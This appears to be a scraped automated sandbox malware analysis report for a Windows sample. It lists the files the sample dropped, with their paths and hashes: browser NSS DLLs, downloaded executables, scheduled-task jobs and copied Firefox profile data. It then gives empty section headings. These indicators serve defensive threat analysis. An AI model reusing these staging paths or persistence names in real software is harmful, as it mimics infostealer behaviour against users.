C:\ProgramData\Microsoft\Windows\WER\Temp\WER8698.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	58667761CF538973CE8169287722A29A	83420B824D48B1079526EB95F3FD7B035963ACA0	3D2309BBADBB9A4C1F44AA2450EF5EDCB57E17AD2E59FA46B49B5BBCFFC3DBDD
C:\ProgramData\Microsoft\Windows\WER\Temp\WER86D7.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	8C1731F68F5070235B3DCF8F31874493	896E9B288C28EACB1BC759759E4E02838F7A433A	F8A2C467D97966573E5521B5F45AD03EA864AE89FD140CD8643DF8B61A4C41C3
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC10F.tmp.dmp	Mini DuMP crash report, 14 streams, Sat Jul 27 03:39:47 2024, 0x1205a4 type	F177CBC5A1CA83D754FFFA78337C6BF7	19CAB3BCB0AF6FD5CE695D18D52F154B413D7475	41EC43A0B0C7D458E71A0C21212382B6E88D533678DDBEDA15E60A0C53AA3395
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC1CC.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	65DF7CFEEC6692F09FF078F3767420FA	A947177EF18A0C3540C270CAA0B227BFF70C9E5E	8ECC05EA6100B7EFC3B67BDD12E60CA0D4348E2AB617E663D546ECAA3C98AB9C
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC1FC.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	41FCCE3FA5C1F0E8AF84A419D240186E	E6011D1830B07D02DF74BA702D7530B31C7E320E	C73EED20D2A1DD0B112923C814F4B84DA943FDE7F6967AC29B09FCE254513C99
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\userKFHCAEGCBF.exe	PE32 executable (GUI) Intel 80386, for MS Windows	4244BD9C011F09D5FB95BBE4CDA9EA93	646DD0D5A7C72F617858F662860CC6AED0EF2753	64216D77F5F0645DA5D3C5BD169875272A1E964F5C69A89151E8C4AE61ECB8EA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	0EF35662ABBE44CF6E064CB524B10742	E022EBFC8011CDDA89BD682001807E87F29DE564	5ADCB9C55CB600170C65B603951EF9B4A9A6E6DD95A7EED765A371BF51D2719E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	E04AFEEB6BB46B372BC1D7C2E2F25EAD	684D7F3CF0F8F94B1A58B39A97FD2F8F37F4A380	71DB154390C24F07114784BF363D39DAC8F1699C517064327724F83CA4ACDFB9
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	4244BD9C011F09D5FB95BBE4CDA9EA93	646DD0D5A7C72F617858F662860CC6AED0EF2753	64216D77F5F0645DA5D3C5BD169875272A1E964F5C69A89151E8C4AE61ECB8EA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	ED89562ECF478105FE0DAB7EB6296170	DF643B7D906041D95ACDB7FE344183E1F1722606	5353C49EA9165ECC52404556A1150EB9413AD072C6CE9ACE7840BE92465EE0EC
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	PE32 executable (GUI) Intel 80386, for MS Windows	E04AFEEB6BB46B372BC1D7C2E2F25EAD	684D7F3CF0F8F94B1A58B39A97FD2F8F37F4A380	71DB154390C24F07114784BF363D39DAC8F1699C517064327724F83CA4ACDFB9
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	PE32 executable (GUI) Intel 80386, for MS Windows	0EF35662ABBE44CF6E064CB524B10742	E022EBFC8011CDDA89BD682001807E87F29DE564	5ADCB9C55CB600170C65B603951EF9B4A9A6E6DD95A7EED765A371BF51D2719E
C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	PE32 executable (GUI) Intel 80386, for MS Windows	ED89562ECF478105FE0DAB7EB6296170	DF643B7D906041D95ACDB7FE344183E1F1722606	5353C49EA9165ECC52404556A1150EB9413AD072C6CE9ACE7840BE92465EE0EC
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	PE32 executable (GUI) Intel 80386, for MS Windows	4244BD9C011F09D5FB95BBE4CDA9EA93	646DD0D5A7C72F617858F662860CC6AED0EF2753	64216D77F5F0645DA5D3C5BD169875272A1E964F5C69A89151E8C4AE61ECB8EA
C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	PE32 executable (GUI) Intel 80386, for MS Windows	E04AFEEB6BB46B372BC1D7C2E2F25EAD	684D7F3CF0F8F94B1A58B39A97FD2F8F37F4A380	71DB154390C24F07114784BF363D39DAC8F1699C517064327724F83CA4ACDFB9
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini	Windows WIN.INI	3FB561547A46AF02D6B00F86DC370634	914867E4C763611B441835A3FC0082359FBF7277	5393F0E8D90EE6A26EAC13B81B83EDC0637487B3E427175021D7EC4CDE8E34A7
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs-1.js	ASCII text, with very long lines (1809), with CRLF line terminators	23FF8467EF36BCCCBAE4A58855DFA546	8A3F1BE1064A2836A921E694B61DE83519C21A48	FD51461506B559DE1314398F0BAAB6A3EB4C357BCB9A613216DDD3AD323A15FC
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js (copy)	ASCII text, with very long lines (1809), with CRLF line terminators	23FF8467EF36BCCCBAE4A58855DFA546	8A3F1BE1064A2836A921E694B61DE83519C21A48	FD51461506B559DE1314398F0BAAB6A3EB4C357BCB9A613216DDD3AD323A15FC
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json (copy)	JSON data	C4AB2EE59CA41B6D6A6EA911F35BDC00	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json.tmp	JSON data	C4AB2EE59CA41B6D6A6EA911F35BDC00	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
C:\Windows\Tasks\axplong.job	data	DC7F8C6148AF63D3E866DABA757B1059	372C94005632D261EE43942E2E63D1F2B26F2363	1B4BA4F6EFEB066E71F4A4F91B60460713518D3D2A3668AEA64018BFC86DF932
C:\Windows\Tasks\explorti.job	data	26AEF698574DE73ECD656D58AF69A946	902CD4424537CF01198176C901450438CF83EFA5	F65A2177550EEF9AE65254CEEA691D5B56BE2E8D5DF2B646E857C4F672CE542E
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	E35DDB2AD29E9798BB58693CED94FB20	185347E63B3CC33803E627FFB97CA3FB2840A899	AC3CCC5277CEAACCFE4A51F77171DD61D6D5B8D7002955B357BA563A4BEDD438

Windows Analysis Report 8NjcvPNvUr.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
8NjcvPNvUr.exe

Malware Threat Intel
Provided by